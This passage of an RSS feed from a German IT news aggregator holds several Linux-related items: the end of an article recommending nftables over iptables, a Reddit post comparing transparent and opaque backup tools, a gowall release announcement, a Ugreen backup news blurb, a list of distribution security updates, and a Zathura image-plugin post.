<p>umzusteigen. Beide verwenden ebenfalls SSH, um sicher auf entfernte Maschinen zuzugreifen. Beide bieten zudem mehr Funktionen und werden vor allem aktiv weiterentwickelt.</p>



<h2 class="wp-block-heading toc">iptables</h2>



<p>Viele Linux-Nutzer setzen das Tool <strong>iptables </strong>zur Paketfilterung und Firewallkonfiguration ein. Mit ihm lassen sich Regeln definieren, die Pakete zulassen, blockieren oder umleiten. </p>



<p>Mittlerweile gilt aber auch iptables als nicht mehr ganz zeitgemäß, vor allem wegen Problemen bei Skalierbarkeit und Leistung. </p>



<p>Daher entwickelt das Netfilter-Projekt selbst, das neben dem Kernel-Subsystem auch das Userland-Tool iptables betreut, mit </p>



<pre class="wp-block-code"><code>nftables </code></pre>



<p>eine Alternative, weil das iptables-Framework etwas unübersichtlich geworden ist.</p>



<p>So ist es zum Beispiel nicht gerade effizient, Regeln für IPv4 mit iptables und für IPv6 mit ip6tables zu erzeugen, um sie dann jeweils mühsam abzugleichen. Mit nftables geht das leichter. </p>



<p>Beide Befehle funktionieren relativ ähnlich, nftables verwendet aber nicht nur eine einfachere Syntax. Das neue Werkzeug versteht sogar noch die Syntax von iptables. Außerdem wurde mit iptables- translate ein weiteres Tool entwickelt, das iptables-Befehle in ihr nftables-Äquivalent umwandelt.</p>



<h2 class="wp-block-heading toc">Fazit: Bitte umsteigen!</h2>



<p>In der Linux-Welt verlaufen Veränderungen eher behutsam. Veraltete Dienstprogramme bleiben oft über Jahre hinweg im Einsatz, selbst wenn längst modernere und sicherere Alternativen verfügbar sind. Erst nach längerer Zeit, manchmal erst nach einigen Jahren, werden diese älteren Tools schrittweise durch ihre aktualisierten Gegenstücke ersetzt. </p>



<p>Dieser Prozess sorgt in der Linux-Community aber auch für Stabilität und Kompatibilität. Viele alte Tools bleiben daher bewusst aus Kompatibilitätsgründen in den Distributionen enthalten, sollten jedoch zumindest in Tutorials, Scripts und neuen Projekten durch ihre moderneren Alternativen ersetzt werden.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[backup and restore : transparent vs opaque]]></title>
<description><![CDATA[I want to discuss the backup and restore functionality in desktop Linux - the various aspects that people consider before zeroing in on a backup flow, advantages of various features, real-world stories behind backups saving the day etc. For the purpose of this discussion, I am dividing the backup...]]></description>
<link>https://tsecurity.de/de/3073873/linux-tipps/backup-and-restore-transparent-vs-opaque/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3073873/linux-tipps/backup-and-restore-transparent-vs-opaque/</guid>
<pubDate>Sat, 01 Nov 2025 02:36:36 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I want to discuss the backup and restore functionality in desktop Linux - the various aspects that people consider before zeroing in on a backup flow, advantages of various features, real-world stories behind backups saving the day etc.</p> <p>For the purpose of this discussion, I am dividing the backup tools into 2 categories :</p> <ol> <li><strong>Transparent</strong> : The backup can be viewed without any tool, or with extremely simple and mostly available tools like tar. E.g. rsync mirror, rsnapshot, backintime, snapper, btrfs/zfs snapshots etc.</li> <li><strong>Opaque</strong> : The backup needs complicated stuff to view, and sometimes cannot be viewed. But a "restore" is much easier. E.g. duplicity, deja-dup.</li> </ol> <p>I see that increasingly, the opaque backup tools are becoming more popular. They are the default in many distributions, suggested to new users, etc. And I don't understand how. I'll explain why "restore from backup" is very dangerous, and my fears around it.</p> <p>The only purpose of backup is to be able to find lost data. Now backups can generally only happen at certain intervals, or events. So a huge majority of backup tools have certain previous states of the system preserved. Any intermediate state between 2 backed up states are typically lost.</p> <p>If the latest backup happened at time t1, data loss happens at time t2. Note that sometimes there may not be a real data loss - only a suspicion. Or data loss happened earlier but we realise later.</p> <p>If we restore backup t1 : all data changes between t2 and t1 are instantaneously lost. If "restore" is the only functionality exposed by the backup tool - we need to do 2 things now to restore :</p> <ol> <li>Mirror the state at t2 in yet another temporary backup location</li> <li>Restore the state at t1</li> <li>Now find the changes between t2 and t1, preserve whatever is important.</li> </ol> <p>This is exceedingly complicated, and one might swear off of data backup completely if we had to do it every time we suspect or confirm loss of data.</p> <p>Instead, if we had a transparent backup - we will directly find, grep, explore in the backup and confirm if we lost / corrupted any data. Take the best of t1 and t2 without any extra step.</p> <p>Now for such an extreme inconvenience while restoring - what is the advantage given by the opaque backup tools ?</p> <ol> <li>Compression ? Whole filesystem compression is far easier, and solves the problem fundamentally.</li> <li>Encryption ? Again, the same. Encrypt the whole block device.</li> <li>Incremental-ness ? Transparent backup systems find it easier to do incremental backups, because they can directly compare with the previous backup instead of storing metadata separately.</li> <li>Partially damaged backup data : this might make the backup completely useless for opaque backup tools. But transparent backups are still highly useful even if partially damaged.</li> <li>Pushing only incremental data to cloud : Here opaque tools could have an advantage, but this aspect is discussed so rarely, documented so scantly I doubt this is what is driving people towards opaque backups.</li> </ol> <p>So what is it ?</p> <p><strong>EDIT</strong> : a misguided commenter mentioned that backups are only for extreme cases where user makes a major mistake or lose the whole computer. I would say this is very dangerous - backups would practically never be tested. A huge majority of users don't have the self-discipline to test the backups periodically. If backups are browsable, just finding previous versions of their files occasionally gives them enough reason to informally "test" their backup. If it is locked up in an opaque format, the only time they confirm that it is working or not will be when they are stuck by a disaster. The computer is lost. They haven't tested their backup tool in 10 years. I don't know any software deployment that works with a probability &gt; 50% if not tested for 10 years.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/mwid_ptxku"> /u/mwid_ptxku </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1okwlhf/backup_and_restore_transparent_vs_opaque/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1okwlhf/backup_and_restore_transparent_vs_opaque/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[OC] - Gowall v0.2.3 The OCR and Image Compression update (Swiss Army knife for image processing)]]></title>
<description><![CDATA[Github link : https://github.com/Achno/gowall Docs: (visual examples,tips,use gowall with scripts): https://achno.github.io/gowall-docs/ Hello all, after a 6 month slumber i have awoken and released gowall v.0.2.3 ,the swiss army knife for image processing, with 2 more core features OCR (Traditio...]]></description>
<link>https://tsecurity.de/de/3036169/linux-tipps/oc-gowall-v023-the-ocr-and-image-compression-update-swiss-army-knife-for-image-processing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3036169/linux-tipps/oc-gowall-v023-the-ocr-and-image-compression-update-swiss-army-knife-for-image-processing/</guid>
<pubDate>Mon, 13 Oct 2025 03:37:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Github link : <a href="https://github.com/Achno/gowall">https://github.com/Achno/gowall</a></p> <p>Docs: (visual examples,tips,use gowall with scripts): <a href="https://achno.github.io/gowall-docs/">https://achno.github.io/gowall-docs/</a></p> <p>Hello all, after a 6 month slumber i have awoken and released <code>gowall v.0.2.3</code> ,the swiss army knife for image processing, with 2 more core features <strong>OCR</strong> (Traditional OCR, Visual Language Models and hybrid methods) and <strong>Image Compression</strong></p> <h5>First Package Management.</h5> <p>Arch (AUR), Fedora (COPR) updated to the latest version since im the maintainer, binaries for all OS in the <a href="https://github.com/Achno/gowall/releases">release section</a>. Obviously you could build it from source see docs for building from source.</p> <p>All others (MacOS,Void,NixOS) are not updated yet.</p> <h5>Feature TLDR</h5> <ul> <li> Convert Wallpaper's theme – Recolor an image to match your favorite + (Custom) themes (Catppuccin etc ...) <ul> <li> <strong>OCR</strong> (Traditional OCR, Visual Language Models and hybrid methods) &lt;-- New</li> <li> <strong>Image Compression</strong> (png,webp,jpg,jpeg) with both lossy and lossless methods when possible &lt;-- New</li> </ul></li> <li><p>AI Image Upscaling </p></li> <li><p>Unix pipes/redirection - Read from <code>stdin</code> and write to <code>stdout</code> </p></li> <li><p>Convert Icon's theme (svg,ico) </p></li> <li><p>Image to pixel art</p></li> <li><p>Replace a specific color in an image </p></li> <li><p>Create a gif from images </p></li> <li><p>Extact color palette</p></li> <li><p>Change Image format</p></li> <li><p>Invert image colors</p></li> <li><p>Draw on the Image - Draw borders,grids on the image </p></li> <li><p>Remove the background of the image</p></li> <li><p>Effects (Mirror,Flip,Grayscale,change brightness and more to come)</p></li> <li><p>Daily wallpapers</p></li> </ul> <p>See <a href="https://github.com/Achno/gowall/releases/tag/v0.2.3">Changelog</a></p> <p>Overall a pretty sweet update if i say so myself, something to keep in mind is that OCR is still in Alpha. I very very highly recommend you checkout the docs escpecially for OCR to get you familiar with the features like <code>schemas</code> and change the <code>rate limits</code> accordingly since i internationally cap the OCR performance for reasons explained in the docs.</p> <p>The next update will probably be Gowall : The color update introducing many color utilities and ways to auto-generate custom themes to use for theme conversion, because i notice a lot of people only use the default themes gowall provides and don't bother to create a custom theme to get their wallpaper looking exactly like they want. Afterall custom themes are very powerful and i want more people to use them.</p> <p>Additionally i made an lossy png compression algo which is better than pngquant in terms of compression to your image looking the same if you look it from afar (obviously much slower than pngquant), but if you take your head and place it right next to your screen you can see flaws which pngquant doesn't have. Thats why i haven't released it in this update, i'm going to try to see if i can improve anything to make it less noticable. </p> <p>I also might improve the image background removal if i can get a pre-trained model working with onnx. Well until next time, see ya.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/FormationHeaven"> /u/FormationHeaven </a> <br> <span><a href="https://i.redd.it/4rlsfkti4puf1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1o4rel4/oc_gowall_v023_the_ocr_and_image_compression/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ugreen arbeitet an flexiblerer Backup-Verschlüsselung]]></title>
<description><![CDATA[Ich hatte mich kürzlich etwas unzufrieden über die Backup-Möglichkeiten von Ugreen ausgelassen. Kurzform: Das angebotene rsync funktioniert laut Info des Herstellers beim Zurückspielen nur, wenn ein Ugreen-NAS das Ziel ist. Relativ ungeil. Am Ende ist es so: Unter der Haube...Zum Beitrag: Ugreen ...]]></description>
<link>https://tsecurity.de/de/3034840/it-nachrichten/ugreen-arbeitet-an-flexiblerer-backup-verschluesselung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3034840/it-nachrichten/ugreen-arbeitet-an-flexiblerer-backup-verschluesselung/</guid>
<pubDate>Sat, 11 Oct 2025 23:00:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ich hatte mich kürzlich etwas unzufrieden über die Backup-Möglichkeiten von Ugreen ausgelassen. Kurzform: Das angebotene rsync funktioniert laut Info des Herstellers beim Zurückspielen nur, wenn ein Ugreen-NAS das Ziel ist. Relativ ungeil. Am Ende ist es so: Unter der Haube...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/ugreen-arbeitet-an-flexiblerer-backup-verschluesselung/">Ugreen arbeitet an flexiblerer Backup-Verschlüsselung</a>
</p><p>

Du kannst uns mit jedem deiner Käufe über Amazon unterstützen. Dein Preis bleibt gleich, wir erhalten eine kleine Provision. <a href="https://www.amazon.de/shop/carsten">Nutze einfach diesen Link</a>. Danke dafür!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (redis and valkey), Fedora (docker-buildkit, ibus-bamboo, pgadmin4, webkitgtk, and wordpress), Mageia (kernel-linus, kmod-virtualbox & kmod-xtables-addons, and microcode), Oracle (compat-libtiff3 and udisks2), Red Hat (rsync), Slackware (python3), SUSE ...]]></description>
<link>https://tsecurity.de/de/3032808/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3032808/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 10 Oct 2025 16:06:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (redis and valkey), <b>Fedora</b> (docker-buildkit, ibus-bamboo, pgadmin4, webkitgtk, and wordpress), <b>Mageia</b> (kernel-linus, kmod-virtualbox &amp; kmod-xtables-addons, and microcode), <b>Oracle</b> (compat-libtiff3 and udisks2), <b>Red Hat</b> (rsync), <b>Slackware</b> (python3), <b>SUSE</b> (chromium, cJSON, digger-cli, glow, go1.24, go1.25, go1.25-openssl, grafana, libexslt0, libruby3_4-3_4, pgadmin4, python311-python-socketio, and squid), and <b>Ubuntu</b> (dpdk, libhtp, vim, and webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[zhathura + imv]]></title>
<description><![CDATA[I always thought that Zathura and imv should be the same project: the ultimate minimalist graphical viewer. Both have some nice features that the other should have (like reading from stdin, recolor, or open a bunch of files). That's why tired to develop a plugin for zathura to view images using G...]]></description>
<link>https://tsecurity.de/de/3030976/linux-tipps/zhathura-imv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3030976/linux-tipps/zhathura-imv/</guid>
<pubDate>Thu, 09 Oct 2025 19:21:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I always thought that <a href="https://pwmt.org/projects/zathura/">Zathura</a> and <a href="https://sr.ht/~exec64/imv/">imv</a> should be the same project: the ultimate minimalist graphical viewer. Both have some nice features that the other should have (like reading from stdin, recolor, or open a bunch of files).</p> <p>That's why tired to develop a plugin for zathura to view images using <a href="https://gitlab.gnome.org/GNOME/gdk-pixbuf">Gdk-PixBuf</a> library: <a href="https://github.com/pololo300/zathura-gdk-pixbuf"> zathura-gdk-pixbuf</a>. It turned out to be supper easy and functional. I couldn't find a complete list of the file formats supported by Gdk-PixBuf, but for now I have: PNG, JPEG, JPG, TIFF and GIF.</p> <p>I'm thinking of making an SVG plugin. Any suggestion of more file formats?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/PassengerCreative269"> /u/PassengerCreative269 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1o26mdt/zhathura_imv/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1o26mdt/zhathura_imv/">[comments]</a></span>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,12ms -->